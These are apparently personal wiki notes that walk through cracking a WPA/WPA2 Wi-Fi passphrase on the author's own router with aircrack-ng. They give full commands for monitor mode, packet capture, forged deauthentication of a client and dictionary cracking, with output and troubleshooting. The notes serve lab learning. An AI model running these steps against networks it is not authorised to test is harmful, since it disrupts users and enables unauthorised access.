Notes on wireless in Kali 2.0: Kali_2.0/Wireless_Debugging
- 1 The Background
- 2 The Hardware
- 3 The Software
- 4 The Procedure
- 4.1 Set Your Router to WPA
- 4.2 Change Your Mac Address
- 4.3 Check Wireless Devices
- 4.4 Switch Wireless Device to Monitor Mode
- 4.5 Scan Networks
- 4.6 Begin the Attack
- 4.7 Finish the Attack
- 4.8 Troubleshooting
- 5 TL; DR
As with the WEP attack we covered, this attack will use aircrack-ng to capture handshake packets, as many as possible, then use those packets to brute-force guess the wireless network's passphrase.
WPA or WPA2?
There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
Here's what the security settings page might look like:
The hardware for simulating this attack on my home network consisted of:
- a router/wireless access point - this router controls the wireless network being attacked
- a laptop running Kali Linux - this is where the attack is being launched from
- a third party on the network (e.g., a phone or a desktop) - not sure if this is necessary
You'll need a laptop running Kali, which will have
aircrack-ng installed. That should be all the software you need.
Set Your Router to WPA
Before doing anything else, we'll change the wireless security protocol of the router to either WPA or mixed WPA/WPA2 encryption.
Now let's pick an easy password, for the sake of example. Like, uh, the word password.
Now we've got our WPAWPA2-enabled router with our super-secure password of "password" - time to get to work.
Change Your Mac Address
Check Wireless Devices
Now that you have your WPAWPA2 network enabled, open up your Kali laoptop. Check the wireless devices available on the computer:
Once again, we'll be using the Panda Wireless USB dongle at
Switch Wireless Device to Monitor Mode
Now use Aircrack to put the wireless device into monitoring mode:
$ airmon-ng start wlan2
This will take
wlan2 down and replace it with
Now we're ready to scan available networks and find our WPAWPA2 router.
Now you can scan the wireless access points around you by running:
$ airodump-ng wlan2mon
Make a note of your target router's channel number and MAC address.
Begin the Attack
Window 1: Monitor Traffic on the Network
In the first window, monitor traffic going to/from the target router by running a more targeted airodump-ng:
$ airodump-ng -d AA:BB:CC:DD:EE -c XX -w aircrack_output wlan2mon
$ airodump-ng --bssid AA:BB:CC:DD:EE --channel XX -w aircrack_output wlan2mon
Make sure you've killed your prior-running airodump command, which was hopping channels, or this command will not work.
Find the Sheep
The weakness we're taking advantage of in WPA is the handshake process: when a client (an unsuspecting sheep) authenticates with the network and sends the encrypted password so the network can verify the client. If an attacker captures packets during this handshake process, they have the encrypted password and can try and crack the sheep's passphrase by brute force.
That means we need to find a sheep that will broadcast their passphrase to the router and anyone else who will listen. So once you're ready, and listening to the network, connect your sheep to the network. (This might be a computer playing internet radio, for example.)
Window 2: Deauthenticate Sheep
The next step is to deauthenticate the sheep.
In window 2, we'll use aireplay to craft deauth packets and send them to the sheep:
$ aireplay-ng -0 1 -a <access point mac address> -c <sheep mac address> wlan2mon
$ aireplay-ng --deauth 1 -a <access pt mac addr> -c <sheep mac addr> wlan2mon
This will generate fake deauthentication packets and send them to the sheep. The sheep will think it has been deauthenticated and kicked off the network. Lonely and desperate and bleating madly, the sheep will begin to broadcast its packets to anyone who will listen - including its encoded passphrase.
If we're listening, we can hear it, and use Aircrack to crack it.
This is Attack Mode Zero in the Aircrack manual.
Finish the Attack
Now we've got what we need in our network capture file. Let's try and crack this password.
You can use whatever you want for your wordlist, if you're attacking a network with a known passkey, just make sure it's in there. I downloaded a list of the 10,000 most common passwords ("password" is number one on the list) from SecLists on GitHub.
Now run Aircrack against the captured data to crack the WPA key, specifying the wordlist:
$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap
and, if you're lucky, you'll see something like this:
Aircrack-ng 1.2 rc2 [00:00:00] 5 keys tested (669.62 k/s) KEY FOUND! [ password ] Master Key : 8A D8 38 DD C7 05 39 9F 02 DE 96 0F 98 E1 C2 EF 01 D0 A8 C4 75 C9 4A C3 04 32 E8 21 53 9E D5 1A Transient Key : FC BB DD FE 34 37 AC 42 D6 15 06 70 0A 2A 6B B0 D6 1C 6A 5C 3B 1D EE 40 C8 20 10 D1 7C 0F 5B A2 5A 92 8A 70 E6 36 2C DA 3E 36 6E CB AE F1 1B FC 78 C5 54 82 BA 84 3F DE 2D 7A BD A0 BD E0 40 AB EAPOL HMAC : 84 B2 3D 30 2D A0 87 D1 A3 2A AC 14 71 28 B5 82
Passphrase Not Found
This was the first result I saw, when I tried to crack my wireless password "password" with a wordlist that had "password" right there at the top:
$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap Opening aircrack_output-05.cap Read 81013 packets. # BSSID ESSID Encryption 1 74:85:2A:97:5B:08 Walrus WPA (1 handshake) Choosing first network as target. Opening aircrack_output-05.cap Reading packets, please wait... Aircrack-ng 1.2 rc2 [00:00:00] 192 keys tested (1269.55 k/s) [00:00:00] 392 keys tested (1287.03 k/s) Current passphrase: cadillac [00:00:00] 592 keys tested (1298.17 k/s) Current passphrase: mariners Master Key [00:00:00] 788 keys tested (1293.03 k/s)D8 A2 0A 61 Current passphrase: commando Master Key [00:00:00] 988 keys tested (1293.68 k/s)53 1E 22 F4 Transient Key : Current passphrase: films+pic+galeries Master Key [00:00:00] 1188 keys tested (1297.01 k/s)2 B4 8F 19 Transient Key : Current passphrase: vikings1 Master Key [00:00:01] 1384 keys tested (1298.15 k/s)D 64 31 3D Transient Key : Current passphrase: hotmail1 Master Key [00:00:01] 1580 keys tested (1298.30 k/s)C F2 54 2D Transient Key : Current passphrase: aviation Master Key [00:00:01] 1776 keys tested (1298.07 k/s)9 65 C7 52 Transient Key : Current passphrase: riffraff Master Key [00:00:01] 1964 keys tested (1293.49 k/s)5 DD 08 AF Transient Key : Current passphrase: smirnoff Master Key : EE 79 F1 E6 3B EF 37 9C A3 19 51 A8 23 CF 0D 46 Transient Key : Current passphrase: skeeter1 Master Key : 60 C0 2086 24 0B 1C 72 9A 86 17 74 52 08 A8 90 Transient Key : B3 18 CB 94 68 ED 4C 8A 67 DF 0C D6 29 66 8A DB Master Key : 35 33 85 0F 54 DC 5F 69 24 54 04 CE D6 D6 C9 D9 Transient Key : 2F A2 7C 56 47 49 2B 81 68 37 3B 69 67 FF AF DE EAPOL HMAC : 14 24 17 98 75 9D E4 AE EB F1 5E BC D2 20 30 CE Transient Key : 21 B2 25 2B 69 56 60 2D BD 87 18 97 10 07 91 84 EAPOL HMAC : 06 14 B6 BE 7B 44 9C B1 51 65 C4 85 BF F7 FF D9 3D A3 16 29 55 33 10 70 C5 B0 59 B6 11 1B 2C 9E EAPOL HMAC : 69 89 39 67 39 D8 95 C3 33 26 A7 9B 31 53 B3 B7 Passphrase not in dictionary Quitting aircrack-ng...
Possible Failure Points
Aircrack can only crack pre-shared keys (PSK). Is my wireless network listed as having PSK? Yes. (AUTH column in airomon-ng)
Aircrack can only handle dictionary words and short passphrases. Is my test router's password too hard? Pretty sure that if a password cracker can't crack a password of "password," it is an abject failure.
Not letting it run long enough? I suspect this may be the issue.
Problems with packet injection? No, everything looks okay. Here are Aircrack/Packet Injection Testing notes.
Something peculiar about my network?
Possibly. Almost definitely. Successful on two other different wireless router makes/models.
Wireshark for Troubleshooting
Can use Wireshark to analyze some of these packet captures. From this site: " Use Wireshark and apply a filter of 'eapol'. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets."
From this page comes a great explanation of how to analyze those packets.
On the first successful network, filtering for eapol packets shows that we had four different sources, which took about 10 minutes to capture.
On the second successful network, filtering eapol packets shows three different sources, and those took about 15 minutes to capture.
On the network setup that is failing, filtering eapol packets shows eapol packets coming from a single destination, despite an hour of capturing packets.
On another (failed) attempt against a network that was later successfully attacked, we had only two sources of eapol packets.
All in all, this means you may need multiple clients on the network - as I observed, the important thing is not having a lot of traffic but having a lot of clients connected and sending EAPOL packets.
Aright, smartass, here you go:
$ airmon-ng # list wireless devices $ airmon-ng start wlan2 # put wlan2 in monitor mode $ airodump-ng wlan2mon # monitor $ airodump-ng --bssid AA:BB:CC:DD:EE -c XX -w aircrack_output wlan2mon # capture packets from target network $ aircrack-ng -w ./wordlist.txt aircrack_output-01.cap # crack the passphrase
aircrack-nga suite of tools for wireless cracking.
Many Ways to Crack a Wifi: Cracking Wifi
Aircrack Benchmarking: Aircrack/Benchmarking
WEP Attacks with Aircrack: Aircrack/WEP Cracking
WPA Attacks with Aircrack: Aircrack/WPA Cracking
Aircrack Hardware: Aircrack/Packet Injection Testing
Basic Usage of Airodump
Flags · Template:AircrackFlag · e